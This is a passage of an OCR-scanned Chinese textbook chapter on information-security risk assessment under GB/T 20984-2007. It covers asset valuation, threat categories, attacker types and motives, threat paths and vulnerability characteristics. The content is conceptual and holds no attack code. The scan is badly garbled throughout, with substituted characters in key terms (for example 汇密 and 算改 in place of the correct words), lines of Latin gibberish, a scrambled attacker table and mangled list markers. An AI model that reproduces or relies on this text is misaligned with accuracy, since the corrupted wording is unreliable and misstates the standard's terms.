础 设施 如 服务 器 、 交 换 机 、 防 火 墙 等 称 之 为 系统 单元 ; 在 系统 单元 上 运行 的 操作 系统 、 
数据 库 、 应 用 软件 等 称 之 为 系统 组 件 。 在 数据 和 服务 等 信息 资产 识别 的 基础 上 ， 根 据 业 
务 处 理 流 程 ， 可 识别 出 支撑 业务 系统 运行 所 需 的 系统 平台 ， 并 且 识 别 出 这 些 软 硬 件 资源 
在 重要 性 、 保 密 性 、 完 整 性 、 可 用 性 、 抗 抵赖 性 等 安全 属性 。 

为 保证 风险 评估 工作 的 进度 要 求 和 质量 要 求 ， 有 时 不 可 能 对 所 有 资产 做 全 面 分 析 ， 
应 选取 其 中 关键 资产 进行 分 析 。 根 据 评估 目标 和 范围 ， 确 定 风险 评估 对 象 中 包含 的 信息 
系统 。 

(1) 识别 信息 系统 处 理 的 业务 功能 ， 以 及 处 理 业务 所 需 的 业务 流程 ， 特 别 应 识别 出 
关键 业务 功能 和 关键 业务 流程 。 

(2) 根据 业务 特点 和 业务 流程 识别 业务 需要 处 理 的 数据 和 提供 的 服务 ， 特 别 应 识别 
出 关键 数据 和 关键 服务 。 

G) 识别 处 理 数据 和 提供 服务 所 需 的 系统 单元 和 系统 组 件 ， 特 别 应 识别 出 关键 系统 
单元 和 关键 系统 组 件 。 

系统 单元 、 系 统 组 件 均 可 作为 安全 技术 脆弱 性 测试 的 测试 对 象 。 所 有 资产 均 可 作为 
安全 管理 脆弱 性 测试 的 测试 对 象 。 

资产 调查 的 方法 包括 阅读 文档 、 访 谈 相 关 人 员 、 查 看 相关 资产 等 。 一 般 情况 下 ， 可 
通过 查阅 信息 系统 需求 说 明 书 、 可 行 性 研究 报告 、 设 计 方案 、 实 施 方案 、 安 装 手册 、 用 
户 使 用 手册 、 测 试 报告 、 运 行 报告 、 安 全 策略 文件 、 安 全 管理 制度 文件 、 操 作 流 程 文件 、 
制度 落实 的 记录 文件 、 资 产 清单 、 网 络 拓扑 图 等 ， 识 别 组 织 和 信息 系统 的 资产 。 

如 文档 记录 信息 之 间 存 在 互相 矛盾 ， 或 存在 不 清楚 的 地 方 ， 以 及 文档 记录 信息 与 实 
际 情况 有 出 入 ， 资 产 识 别 须 就 关键 资产 和 关键 问题 与 被 评估 组 织 相 关 人 员 进 行 核 实 ， 并 
选择 在 组 织 和 信息 系统 管理 中 担任 不 同 角色 的 人 员 进 行 访谈 , 包括 主管 领导 、 业 务 人 员 、 
开发 人 员 、 实 施 人 员 、 运 维 人 员 、 监 督 管理 人 员 等 等 。 通 常情 况 下 ， 经 过 阅读 文档 和 现 
场 访谈 相关 人 员 ， 基 本 可 清晰 识别 组 织 和 信息 系统 资产 ， 对 关键 资产 应 进行 现场 实际 
查看 。 

3. 资产 赋值 

在 资产 调查 基础 上 ， 需 分 析 资 产 的 保密 性 、 完 整 性 和 可 用 性 等 安全 属性 的 等 级 ， 安 
全 属性 等 级 包括 : 很 高 、 高 、 中 等 、 低 、 很 低 五 种 级 别 ， 某 种 安全 属性 级 别 越 高 表示 资 
产 该 安全 属性 越 重要 。 保 密 性 、 完 整 性 、 可 用 性 的 五 个 赋值 的 含义 可 参考 《信息 安全 技 
术 信息 安全 风险 评估 规范 》(GB/T 20984-2007). 

因 资 产 保密 性 、 完 整 性 和 可 用 性 等 安全 属性 的 量化 过 程 易 带 有 主观 性 ， 可 以 参考 如 
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下 因素 , 利用 加 权 等 方法 综合 得 出 资产 保密 性 、 完整 性 和 可 用 性 等 安全 属性 的 赋值 等 级 : 
(1) 资产 所 承载 信息 系统 的 重要 性 ; 
(2) 资产 所 承载 信息 系统 的 安全 等 级 ; 
(3) 资产 对 所 承载 信息 安全 正常 运行 的 重要 程度 ; 
(4) 资产 保密 性 、 完 整 性 、 可 用 性 等 安全 属性 对 信息 系统 ， 以 及 相关 业务 的 重要 


程度 。 
资产 价值 应 依据 资产 保密 性 、 完 整 性 和 可 用 性 的 赋值 等 级 ， 经 综合 评定 确定 。 资 产 
价值 等 级 包括 : 很 高 、 高 、 中 等 、 低 、 很 低 五 种 等 级 ， 每 种 等 级 含义 可 以 参考 《信息 安 
全 技术 信息 安全 风险 评估 规范 》(GB/T 20984—2007). 

综合 评定 的 方法 可 根据 信息 系统 所 承载 的 业务 对 不 同安 全 属性 的 依赖 程度 ， 选 择 资 
产 保密 性 、 完 整 性 和 可 用 性 最 为 重要 的 一 个 属性 的 赋值 等 级 作为 资产 的 最 终 赋值 结果 
也 可 以 根据 资产 保密 性 、 完 整 性 和 可 用 性 的 不 同等 级 对 其 赋值 进行 加 权 计 算得 到 资产 的 
最 终 赋 值 结果 ， 加 权 方 法 可 根据 组 织 的 业务 特点 确定 。 评 估 小 组 可 根据 资产 赋值 结果 ， 
确定 关键 资产 范围 ， 并 围绕 关键 资产 进行 后 续 的 风险 评估 工作 。 

4. 资产 赋值 报告 

经 过 资产 识别 和 资产 分 析 ， 确 定 了 组 织 和 信息 系统 中 的 资产 ， 明 确 了 资产 价值 以 及 
相应 的 保密 性 、 完 整 性 、 可 用 性 等 安全 属性 情况 ， 了 解 资 产 之 间 的 相互 关系 和 影响 ， 识 
别 出 重 要 资产 ， 在 此 基础 上 ， 可 形成 资产 列表 和 资产 赋值 报告 。 资 产 赋值 报告 是 进行 威 
胁 识别 和 脆弱 性 识别 的 重要 依据 。 

资产 赋值 报告 中 ， 应 包括 如 下 内 容 : 

(1) 各 项 资产 ， 特 别 是 关键 资产 的 资产 名 称 、 类 别 、 保 密 性 赋值 、 完 整 性 赋值 、 可 
用 性 赋值 、 资 产 价值 以 及 资产 所 承载 的 信息 系统 ; 

(2) 通过 资产 保密 性 、 完 整 性 、 可 用 性 计算 资产 价值 的 方法 ; 

(3) 关键 资产 说 明 等 。 
6.3.2.2 ”威胁 识别 

威胁 是 指 可 能 导致 危害 系统 或 组 织 的 不 希望 事故 的 潜在 起 因 。 威 胁 是 客观 存在 的 ， 
无 论 对 于 多 么 安全 的 信息 系统 , 它 都 存在 。 威胁 的 存在 ,组织 和 信息 系统 才 会 存在 风险 。 
因此 ， 风 险 评估 工作 中 ， 需 全 面 、 准 确 地 了 解 组 织 和 信息 系统 所 面临 的 各 种 威胁 。 

1. 威胁 分 类 

按照 《信息 安全 技术 信息 安全 风险 评估 规范 》(GB/T 20984—2007) 威胁 分 类 方法 ， 
可 威胁 分 为 软 便 件 故 障 、 物 理 环 境 影响 、 无 作为 或 操作 失误 、 管 理 不 到 位 、 恶 意 代码 、 
越权 或 滥用 、 网 络 攻击 、 物 理 攻 击 、 汇 密 、 算 改 、 抵 赖 11 类 。 

根据 威胁 产生 的 起 因 、 表 现 和 后 果 不 同 ， 威 胁 可 分 为 : 

(1) 有 害 程序 。 有 害 程序 是 指 插 入 到 信息 系统 中 的 一 段 程序 ， 和 危害 系统 中 数据 、 应 
用 程序 或 操作 系统 的 保密 性 、 完 整 性 或 可 用 性 ， 或 影响 信息 系统 的 正常 运行 。 和 危害 程序 
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包括 : 计算 机 病毒 、 蠕 虫 、 特 洛 伊 木 马 、 僵 尸 网 络 、 混 合 攻击 程序 、 网 页 内 嵌 恶 意 代码 
和 其 他 有 害 程 序 。 

(2) 网 络 攻击 。 网 络 攻击 是 指 通过 网 络 或 其 他 手段 ， 利 用 信息 系统 的 配置 缺陷 、 协 
议 缺 陷 、 程 序 缺 陷 或 使 用 暴力 攻击 对 信息 系统 实施 攻击 ， 并 造成 信息 系统 异常 或 对 信息 
系统 当前 运行 造成 潜在 危害 。 网 络 攻 击 包括 : 拒绝 服务 攻击 、 后 门 攻击 、 漏 洞 攻 击 、 网 
络 扫描 窃听 、 网 络 钓鱼 、 干 扰 和 其 他 网 络 攻击 。 

G) 信息 破坏 。 信 息 破 坏 是 指 通过 网 络 或 其 他 技术 手段 ， 造 成 信息 系统 中 的 信息 被 
自 改 、 假 冒 、 泄 露 、 窃 取 等 。 信 息 破坏 包括 : 信息 自 改 、 信 息 假冒 、 信 息 泄 露 、 信 息 窃 
取 、 信 息 丢 失 及 其 他 信息 破坏 。 

(4) 信息 内 容 攻 击 。 信 息 内 容 攻 击 指 利用 信息 网 络 发 布 、 传 播 危害 国家 安全 、 社 会 
稳定 和 公共 利益 、 企 业 和 个 人 利益 的 内 容 的 攻击 。 

(5) 设备 设施 故障 。 设备 设施 故障 是 指 由 于 信息 系统 自身 故障 或 外 围 保障 设施 故障 ， 
造成 信息 系统 异常 或 对 信息 系统 当前 运行 造成 潜在 危害 。 设 备 设施 故障 包括 : 软 硬 件 自 
身 故 障 、 外 围 保障 设施 故障 、 人 为 破坏 和 其 他 设备 设施 故障 。 

(6) 灾害 性 破坏 。 灾 害 性 破坏 指 由 于 不 可 抗力 对 信息 系统 造成 物理 破坏 。 灾 害 性 破 
Kak: KR EA WE Eh Hi KK aR RPE 

(7) 其 他 威胁 。 

2. 威胁 调查 

威胁 是 客观 存在 的 ， 任 何 一 个 组 织 和 信息 系统 都 面临 威胁 。 但 在 不 同 组 织 和 信息 系 
统 中 ， 威 胁 发 生 的 可 能 性 和 造成 的 影响 可 能 不 同 。 不 仅 如 此 ， 同 一 个 组 织 或 信息 系统 中 
不 同 资产 所 面临 的 威胁 发 生 的 可 能 性 和 造成 的 影响 也 可 能 不 同 。 威 胁 调查 就 是 要 识别 组 
织 和 信息 系统 中 可 能 发 生 并 造成 影响 的 威胁 ， 进 而 分 析 哪 些 发 生 可 能 性 较 大 、 可 能 造成 
重大 影响 的 威胁 。 

威胁 调查 工作 包括 : 威胁 源 动 机 及 其 能 力 、 威 胁 途 径 、 威 胁 可 能 性 及 其 影响 。 

(1) 威胁 源 动机 及 其 能 力 

威胁 源 是 产生 威胁 主体 。 在 进行 威胁 调查 时 ， 首 要 应 识别 存在 哪些 威胁 源 ， 同 时 分 
析 这 些 威胁 源 的 动机 和 能 力 。 根 据 威胁 源 的 不 同 ， 可 以 将 威胁 分 为 非 人 为 的 和 人 为 的 。 

对 信息 系统 非 人 为 的 安全 威胁 主要 是 自然 灾难 。 典 型 的 自然 灾难 包括 : 水 灾 、 台风、 
地 震 、 雷 击 、 拥 塌 、 火 灾 、 恺 怖 袭击 、 战 争 等 。 自 然 灾难 可 能 会 对 信息 系统 造成 毁灭 性 
的 破坏 。 另 外 ， 由 于 技术 的 局 限 性 ， 造 成 系统 不 稳定 、 不 可 靠 等 情况 ， 也 会 引发 安全 事 
件 ， 这 也 是 非 人 为 的 安全 威胁 。 

人 为 的 安全 威胁 是 指 某 些 个 人 和 组 织 对 信息 系统 造成 的 安全 威胁 。 人 为 的 安全 威胁 
主体 可 以 来 自 组 织 内 部 ， 也 可 以 来 自 组 织 外 部 。 

从 威胁 动机 来 看 ， 人 为 的 安全 威胁 又 可 细 分 为 非 恶 意 行为 和 恶意 攻击 行为 。 非 恶意 
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行为 主要 包括 粗心 或 未 受到 良好 培训 的 管理 员 和 用 户 , 由 于 特殊 原因 而 导致 的 无 意 行为 ， 
造成 对 信息 系统 的 破坏 。 恶 意 攻 击 是 指出 于 各 种 目的 而 对 信息 系统 实施 的 攻击 。 恶 意 攻 
击 具 有 明显 的 目的 性 ， 一 般 经 过 精心 策略 和 准备 ， 并 可 能 是 有 组 织 的 ， 并 投入 一 定 的 资 
源 和 时 间 。 

不 同 的 危险 源 具 有 不 同 的 攻击 能 力 , 攻击 者 的 能 力 越 强 , 攻击 成 功 的 可 能 性 就 越 大 。 
衡量 攻击 能 力主 要 包括 : 施展 攻击 的 知识 、 技 能 、 经 验 和 必要 的 资金 、 人 力 和 技术 资 
源 等 。 

恶意 员工 具有 的 知识 和 技能 一 般 非 常 有 限 ， 攻 击 能 力 较 弱 ， 但 恶意 员工 可 能 掌握 关 
于 系统 的 大 量 信息 ， 并 具有 一 定 的 权限 ， 而 且 比 外 部 的 攻击 者 有 更 多 的 攻击 机 会 ， 攻 击 
的 成 功率 高 ， 属 于 比较 严重 的 安全 威胁 。 

独立 黑客 是 个 体 攻击 者 ， 可 利用 资源 有 限 ， 主 要 采用 外 部 攻击 方式 ， 通 常 发 动 零散 
的 、 无 目的 的 攻击 ， 攻 击 能 力 有 限 。 

国内 外 竞争 者 、 犯 罪 团 伙 和 怒 怖 组 织 是 有 组 织 攻击 者 ， 具 有 一 定 的 资源 保障 ， 具 有 
较 强 的 协作 能 力 和 计算 能 力 ， 攻 击 目的 性 强 ， 可 进行 长 期 深入 的 攻击 准备 ， 并 能 够 采取 
外 部 攻击 、 内 部 攻击 和 邻近 攻击 相 结合 的 攻击 方式 ， 甚 至 进行 简单 的 分 发 攻击 方式 ， 攻 
击 能 力 很 强 。 

来 自 国家 行为 的 攻击 是 能 力 最 强 的 攻击 ， 国 家 攻击 行为 不 仅 组 织 严密 ， 具 有 充足 资 
金 、 人 力 和 技术 资源 ， 而 且 可 能 在 必要 时 实施 高 隐蔽 性 和 高 破坏 性 的 分 发 攻击 ， 窃 取 组 
织 核心 机 密 或 使 网 络 和 信息 系统 全 面瘫 痪 。 表 6-12 分 析 了 典型 的 攻击 者 类 型 、 动 机 和 
特点 。 


表 6-12 典型 的 攻击 者 类 型 、 动 机 和 能 力 


掌握 内 部 情况 ,了 解 系统 结构 和 
配置 具有 系统 合法 账户 , RE 
握 可 利用 的 账户 信息 ; 可 以 从 内 
部 攻击 系统 最 薄弱 环节 


主要 指 对 机 构 不 | 由 于 对 机 构 不 满 而 有 意 破 
恶意 员工 满 或 具有 某 种 恶 | 坏 系统 ， 或 出 于 某 种 目的 
意 目的 内 部 员工 | 窃取 信息 或 破坏 系统 


企图 寻找 并 利用 信息 系统 


的 脆弱 性 ， 以 达到 满足 好 | 占有 少量 资源 , 一 般 从 系统 外 部 
独立 黑客 主要 指 个 体 黑客 | 奇 心 、 检 验 技术 能 力 以 及 | 侦察 并 攻击 网 络 和 系统 ; 攻击 者 


恶意 破坏 等 目的 ; 动机 复 | 水 平 高 低 差异 很 大 
杂 ， 目 的 性 不 强 
主要 指 具 有 竞争 | 获取 商业 情报 ; 破坏 竞争 


关系 的 国内 外 工 | 对 手 的 业务 和 声誉 ， 目 的 
业 和 商业 机 构 性 较 强 


具有 一 定 的 资金 、 人 力 和 技术 资 
源 。 主要 是 通过 多 种 渠道 搜集 情 
报 ， 包 括 利 用 竞争 对 手 内 部 员 
工 、 独 立 黑客 以 至 犯罪 团伙 
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续 表 


主要 指 计算 机 犯 

罪 团伙 。 对 犯罪 | 偷窃 、 诈 骗 钱财 ， 窃 取 机 
行为 可 能 进行 长 | 密 信 息 

期 的 策划 和 投入 


具有 一 定 的 资金 、 人 力 和 技术 资 
源 ; 实施 网 上 犯罪 ， 对 犯罪 有 精 
密 划 和 准备 


Rei ZA TI SI BRIT | 具有 丰富 的 资金 人力 和 技术 资 
SE SETHE AMR | 政府 或 社会 以 满足 其 需要 | 源 , 对 攻击 行为 可 能 进行 长 期 策 
怖 组 织 为 目的 ， 采 用 暴力 或 暴力 | 划 和 投入 , 可 能 获得 敌对 国家 的 
威胁 方式 制造 恐慌 支持 


恐怖 组 织 


主要 指 其 他 国家 
或 地 区 设立 的 从 | 从 其 他 国家 搜集 政治 、 经 | 组 织 严密 、 具 有 充足 的 资金 、 人 
外 国政 府 事 网 络 和 信息 系 | 济 、 军 事情 报 或 机 密 信息 ，| 力 和 技术 资源 ; 将 网 络 和 信息 系 
统 攻 击 的 军事 、 | 目的 性 极 强 统 攻 击 作为 战争 的 作战 手段 

情报 等 机 构 


在 识别 威胁 源 时 ， 一 方面 要 调查 存在 哪些 威胁 源 ， 特 别 要 了 解 组 织 的 客户 、 伙 伴 或 
竞争 对 手 以 及 系统 用 户 等 情况 ， 另 一 方面 要 调查 不 同 威胁 源 的 动机 、 特 点 、 发 动 威胁 的 
能 力 等 。 通 过 威胁 源 的 分 析 ， 识 别 出 威 胁 源 名 称 、 类 型 (包括 自然 环境 、 系 统 缺 陷 、 政 
府 、 组 织 、 职 业 个 人 等 ) 、 动 机 〈 非 人 为 、 人 为 非 故 意 、 人 为 故意 等 ) 。 

(2) 威胁 途径 

威胁 途径 是 指 威胁 源 对 组 织 或 信息 系统 造成 破坏 的 手段 和 路 径 。 非 人 为 的 威胁 途径 
表现 为 发 生 自然 灾难 、 出 现 恶 劣 的 物理 环境 、 出 现 软 硬 件 故障 或 性 能 降低 等 ， 人 为 的 威 
胁 手段 包括 : 主动 攻击 、 被 动 攻击 、 邻 近 攻 击 、 分 发 攻击 、 误 操作 等 。 其 中 人 为 的 威胁 

主动 攻击 为 攻击 者 主动 对 信息 系统 实施 攻击 ， 导 致 信息 或 系统 功能 改变 。 常 见 的 主 
动 攻击 包括 :利用 缓冲 区 溢出 (Buffer Overflow, BOF) 漏洞 执行 代码 ， 协 议 、 软 件 、 
系统 故障 和 后 门 ， 插 入 和 利用 恶意 代码 〈 如 : 特洛伊 木马、 后门 、 病 毒 等 ) ， 伪 装 ， 盗 
取 合法 建立 的 会 话 ， 非 授权 访问 ， 越 权 访问 ， 重 放 所 截获 的 数据 ， 修 改 数据 ， 插 入 数据 ， 
拒绝 服务 攻击 等 。 

被 动 攻击 不 会 导致 对 系统 信息 的 自 改 ， 而 且 系统 操作 与 状态 不 会 改变 。 被 动 攻击 一 
般 不 易 被 发 现 。 常 见 的 被 动 攻击 包括 : 侦察 、 嗅 探 、 监 听 、 流 量 分 析 、 口 令 截 获 等 。 

邻近 攻击 是 指 攻击 者 在 地 理 位 置 上 尽 可 能 接近 被 攻击 的 网 络 、 系 统 和 设备 ， 目 的 是 
修改 、 收 集 信 息 , 或 者 破坏 系统 。 这 种 接近 可 以 是 公开 的 或 隐秘 的 ， 也 可 能 是 两 种 都 有 。 
常见 的 包括 : 偷 取 磁盘 后 又 还 回 ， 偷 完 屏幕 信息 ， 收 集 作 废 的 打印 纸 ， 房 间 窃 听 ， 毁 坏 
通信 线路 。 

分 发 攻击 是 指 在 软件 和 硬件 的 开发 、 生 产 、 运 输 和 安装 阶段 , 攻击 者 恶意 修改 设计 、 
配置 等 行为 。 常 见 的 包括 : 利用 制造 商 在 设备 上 设置 隐藏 功能 ， 在 产品 分 发 、 安 装 时 修 
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改 软 硬 件 配置 ， 在 设备 和 系统 维护 升级 过 程 中 修改 软 硬 件 配 置 等 。 直 接 通 过 互联 网 进行 
远程 升级 维护 具有 较 大 的 安全 风险 。 

误 操作 是 指 由 于 合法 用 户 的 无 意 行为 造成 了 对 系统 的 攻击 ， 误 操作 并 非 故 意 要 破坏 
信息 和 系统 ， 但 由 于 误 操作 、 经 验 不 足 、 培 训 不 足 而 导致 一 些 特殊 的 行为 发 生 ， 从 而 对 
系统 造成 了 无 意 的 破坏 。 常 见 的 误 操作 包括 : 由 于 牙 忽 破 坏 了 设备 或 数据 、 删 除 文件 或 
数据 、 破 坏 线路 、 配 置 和 操作 错误 、 无 意 中 使 用 了 破坏 系统 命令 等 。 

威胁 源 对 威胁 客体 造成 破坏 , 有 时 候 并 不 是 直接 的 , 而 是 通过 中 间 若 干 媒介 的 传递 ， 
形成 一 条 威胁 路 径 。 在 风险 评估 工作 中 ， 调 查 威胁 路 径 有 利于 分 析 各 个 环节 威胁 发 生 的 
可 能 性 和 造成 的 破坏 。 威 胁 路 径 调 查 要 明确 威胁 发 生 的 起 点 、 威 胁 发 生 的 中 间 点 以 及 威 
胁 发 生 的 终点 ， 并 明确 威胁 在 不 同 环节 的 特点 。 

(3) 威胁 可 能 性 及 其 影响 

威胁 是 客观 存在 的 ， 但 对 于 不 同 的 组 织 和 信息 系统 ， 威 胁 发 生 的 可 能 性 不 尽 相 同 。 
威胁 产生 的 影响 与 脆弱 性 是 密切 相关 的 。 脆 弱 性 越 多 、 越 严重 ， 威 胁 产 生 影 响 的 可 能 性 
越 大 。 例 如 ， 在 雨水 较 多 的 地 区 ， 出 现 洪 灾 的 可 能 性 较 大 ， 因 此 对 于 存在 严重 漏洞 的 系 
统 ， 被 威胁 攻击 的 成 功 性 可 能 较 大 。 

威胁 客体 是 威胁 发 生 时 受到 影响 的 对 象 ， 威 胁 影响 跟 威胁 客体 密切 相关 。 当 一 个 威 
胁 发 生 时 ， 会 影响 到 多 个 对 象 。 这 些 威胁 客体 有 层次 之 分 ， 通 常 威胁 直接 影响 的 对 象 是 
资产 ， 间 接 影 响 到 信息 系统 和 组 织 。 在 识别 威胁 客体 时 ， 首 先 识 别 那些 直接 受 影响 的 客 
体 ， 再 逐 层 分 析 问 接受 影响 的 客体 。 

威胁 客体 的 价值 越 重要 ， 威 胁 发 生 的 影响 越 大 ;威胁 破坏 的 客体 范围 越 广泛 ， 威 胁 
发 生 的 影响 越 大 。 分 析 并 确认 威胁 发 生 时 受 影响 客体 的 范围 和 客体 的 价值 ， 有 利于 分 析 
组 织 和 信息 系统 存在 风险 的 大 小 。 

遭 到 威胁 破坏 的 客体 ， 有 的 可 以 补救 且 补 救 代价 可 以 接受 ， 有 的 不 能 补救 或 补救 代 
价 难以 接受 。 受 影响 客体 的 可 补救 性 也 是 威胁 影响 的 一 个 重要 方面 。 

(4) 威胁 调查 方法 

不 同 组 织 和 信息 系统 由 于 所 处 自然 环境 、 业 务 类 型 等 不 尽 相 同 ， 面 临 的 威胁 也 具有 
不 同 的 特点 。 例 如 ， 处 于 自然 环境 恶劣 的 信息 系统 ， 发 生 自然 灾难 的 可 能 性 较 大 ， 业 务 
价值 高 或 敏感 的 系统 遭遇 攻击 的 可 能 性 较 大 。 威 胁 调查 的 方法 多 种 多 样 ， 可 以 根据 组 织 
和 信息 系统 自身 的 特点 ， 发 生 的 历史 安全 事件 记录 ， 面 临 威胁 分 析 等 方法 进行 调查 。 

运行 过 一 段 时 间 的 信息 系统 ， 可 根据 以 往 发 生 的 安全 事件 记录 ， 分 析 信 息 系统 面临 
的 威胁 。 例 如 ， 系 统 受 到 病毒 攻击 频率 ， 系 统 不 可 用 频率 ， 系 统 遭 遇 黑 客 攻击 频率 等 等 。 

在 实际 环境 中 ， 通 过 检测 工具 以 及 各 种 日 志 ， 可 分 析 信 息 系统 面临 的 威胁 。 

对 信息 系统 而 言 ， 可 参考 组 织 内 其 他 信息 系统 面临 的 威胁 来 分 析 本 系统 所 面临 威 
Wes 对 组 织 而 言 ， 可 参考 其 他 类 似 组 织 或 其 他 组 织 类 似 信息 系统 面临 威胁 分 析 本 组 织 和 
本 系统 面临 威胁 。 
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一 些 第 三 方 组 织 发 布 的 安全 态势 方面 的 数据 。 

3. 威胁 分 析 

通过 威胁 调查 ， 可 识别 存在 的 威胁 源 名 称 、 类 型 、 攻 击 能 力 和 攻击 动机 ， 威 胁 路 径 ， 
威胁 发 生 可 能 性 ， 威 胁 影 响 的 客体 的 价值 、 履 盖 范 围 、 破 坏 严重 程度 和 可 补救 性 。 在 威 
胁 调 查 基础 上 ， 可 作 如 下 威胁 分 析 : 

d) 通过 分 析 威胁 路 径 ， 结 合 威胁 自身 属性 、 资 产 存在 的 脆弱 性 以 及 所 采取 的 安全 
措施 ， 识 别 出 威 胁 发 生 的 可 能 性 ， 也 就 是 威胁 发 生 的 概率 。 

(2) 通过 分 析 威 胁 客 体 的 价值 和 威胁 覆盖 范围 、 破 坏 严 重 程度 和 可 补救 性 等 ， 识 别 
威胁 影响 。 

(3) 分 析 并 确定 由 威胁 源 攻 击 能 力 、 攻 击 动机 ， 威 胁 发 生 概率 、 影 响 程度 计算 威胁 
值 的 方法 。 

(4) 威胁 赋值 。 

综合 分 析 上 述 因素 ， 对 威胁 的 可 能 性 进行 赋值 ， 威 胁 赋值 分 为 很 高 、 高 、 中 等 、 低 、 
很 低 5 个 级 别 ， 级 别 越 高 表示 威胁 发 生 的 可 能 性 越 高 。 各 级 别 含义 可 参照 《信息 安全 技 
术 信息 安全 风险 评估 规范 》 (GB/T 20984-2007) 。 

4. 威胁 分 析 报告 

通过 威胁 调查 和 威胁 分 析 ， 可 确定 组 织 或 信息 系统 面临 的 威胁 源 、 威 胁 方式 以 及 影 
响 ， 在 此 基础 上 ， 可 形成 威胁 分 析 报 告 。 威 胁 分 析 报 告 是 进行 脆弱 性 识别 的 重要 依据 ， 
在 脆弱 性 识别 时 ， 对 于 那些 可 能 被 严重 威胁 利用 的 脆弱 性 要 进行 重点 识别 。 

威胁 分 析 报 告 应 包括 如 下 内 容 : 

CL) 威胁 名 称 、 威 胁 类 型 、 威 胁 源 攻 击 能 力 、 攻 击 动机 、 威 胁 发 生 概率 、 影 响 程 度 
以 及 威胁 发 生 的 可 能 性 

(2) 威胁 赋值 ; 

(3) 严重 威胁 说 明 等 。 
6.3.2.3 ”脆弱 性 识别 

脆弱 性 是 资产 自身 存在 的 ， 如 没有 被 威胁 利用 ， 脆 弱 性 本 身 不 会 对 资产 造成 损害 。 
如 信息 系统 足够 健壮 ， 威 胁 难以 导致 安全 事件 的 发 生 。 也 就 是 说 ， 威 胁 是 通过 利用 资产 
的 脆弱 性 ， 才 可 能 造成 危害 。 因 此 ， 组 织 一 般 通 过 尽 可 能 消减 资产 的 脆弱 性 ， 来 阻止 或 
消减 威胁 造成 的 影响 ， 所 以 脆弱 性 识别 是 风险 评估 中 最 重要 的 一 个 环节 。 

脆弱 性 可 从 技术 和 管理 两 个 方面 进行 识别 。 技 术 方 面 ， 可 从 物理 环境 、 网 络 、 主 机 
系统 、 应 用 系统 、 数 据 等 方面 识别 资产 的 脆弱 性 ;管理 方面 ， 可 从 技术 管理 脆弱 性 和 组 
织 管理 脆弱 性 两 方面 识别 资产 的 脆弱 性 ， 技 术 管理 脆弱 性 与 具体 技术 活动 相关 ， 组 织 管 
理 脆弱 性 与 管理 环境 相关 。 

脆弱 性 识别 包括 : 脆弱 性 的 基本 特征 ， 时 间 特 征 和 环境 特征 的 识别 。 

脆弱 性 的 基本 特征 包括 : 
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O 访问 路 径 。 该 特征 反映 了 脆弱 性 被 利用 的 路 径 ， 包 括 : 本 地 访问 ， 邻 近 网 络 访 
问 ， 远 程 网 络 访问 。 

© 访问 复杂 性 。 该 特征 反映 了 攻击 者 能 访问 目标 系统 时 利用 脆弱 性 的 难 易 程度 ， 
可 用 高 、 中 、 低 三 个 值 进行 度量 。 

© 鉴别 。 该 特征 反映 了 攻击 者 为 了 利用 脆弱 性 需要 通过 目标 系统 鉴别 的 次 数 ， 可 
用 多 次 、1 次 、0 次 三 个 值 进行 度量 。 

© 保密 性 影响 。 该 特征 反映 了 脆弱 性 被 成 功利 用 时 对 保密 性 的 影响 ， 可 用 完全 泄 
密 、 部 分 泄密 、 不 泄密 三 个 值 进行 度量 。 

© 完整 性 影响 。 该 特征 反映 了 脆弱 性 被 成 功利 用 时 对 完整 性 的 影响 ， 可 用 完全 修 
改 、 部 分 修改 、 不 能 修改 三 个 值 进行 度量 。 

@ 可 用 性 影响 。 该 特征 反映 了 脆弱 性 被 成 功利 用 时 对 可 用 性 的 影响 ， 可 用 完全 不 
可 用 、 部 分 可 用 、 可 用 性 不 受 影响 三 个 值 进行 度量 。 

脆弱 性 的 时 间 特 征 包括 : 

@ 可 利用 性 。 该 特征 反映 了 脆弱 性 可 利用 技术 的 状态 或 脆弱 性 可 利用 代码 的 可 获 
得 性 ， 可 用 未 证 明 、 概 念 证 明 、 可 操作 、 易 操作 、 不 确定 六 个 值 进行 度量 。 

© 补救 级 别 。 该 特征 反映 了 脆弱 性 可 补救 的 级 别 ， 可 用 官方 正式 补救 方案 、 官 方 
临时 补救 方案 、 非 官方 补救 方案 、 无 补救 方案 、 不 确定 五 个 值 进行 度量 。 

© 报告 可 信 性 。 该 特征 反映 了 脆弱 性 存在 的 可 信 度 以 及 脆弱 性 技术 细节 的 可 信 度 ， 
可 用 未 证 实 、 需 进一步 证 实 、 已 证 实 、 不 确定 四 个 值 进行 度量 。 

脆弱 性 的 环境 特征 包括 : 

D 破坏 潜力 。 该 特征 反映 了 通过 破坏 或 偷窃 财产 和 设备 ， 造 成 物理 资产 和 生命 损 
失 的 潜在 可 能 性 ， 可 用 无 、 低 、 中 等 偏 低 、 中 等 偏 高 、 高 、 不 确定 六 个 值 进行 度量 。 

@ 目标 分 布 。 该 特征 反映 了 存在 特定 脆弱 性 的 系统 的 比例 ， 可 用 无 、 低 、 中 、 高 、 
不 确定 五 个 值 进行 度量 。 

© 安全 要 求 。 该 特征 反映 了 组 织 和 信息 系统 对 IT 资产 的 保密 性 、 完 整 性 和 可 用 性 
的 安全 要 求 ， 可 以 用 低 、 中 、 高 、 不 确定 四 个 值 进行 度量 。 

在 识别 脆弱 性 同时 ， 评 估 人 员 应 对 已 采取 的 安全 措施 及 其 有 效 性 进行 确认 。 安 全 措 
施 的 确认 应 分 析 其 有 效 性 ， 即 是 否 能 够 抵御 威胁 的 攻击 。 对 有 效 的 安全 措施 继续 保持 ， 
以 避免 不 必要 的 工作 和 费用 ， 防 止 安全 措施 的 重复 实施 ， 对 确认 为 不 适当 的 安全 措施 应 
核实 是 否 需要 取消 或 对 其 进行 修正 ， 或 用 更 合适 的 安全 措施 替代 。 

脆弱 性 识别 所 采用 的 方法 主要 有 : 文档 查阅 、 问 卷 调查 、 人 工 核查 、 工 具 检测 、 渗 
透 性 测试 等 。 

1. 安全 技术 脆弱 性 核查 

安全 技术 脆弱 性 核查 包括 ， 检 查 组 织 和 信息 系统 自身 在 技术 方面 存在 的 脆弱 性 ， 以 
及 核查 所 采取 的 安全 措施 有 效 程度 。 
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(1) 物理 环境 安全 

物理 环境 安全 脆弱 性 是 指 机 房 和 办 公 建 筑 物 及 其 配套 设施 、 设 备 、 线 路 以 及 用 电 在 
安全 方面 存在 的 脆弱 性 ， 包 括 : 建筑 物 、 设 备 或 线路 遭 到 破坏 或 出 现 故 障 、 遭 到 非法 访 
问 ， 设 备 被 盗 穷 ， 出 现 信息 泄露 ， 出 现 用 电 中 断 等 。 

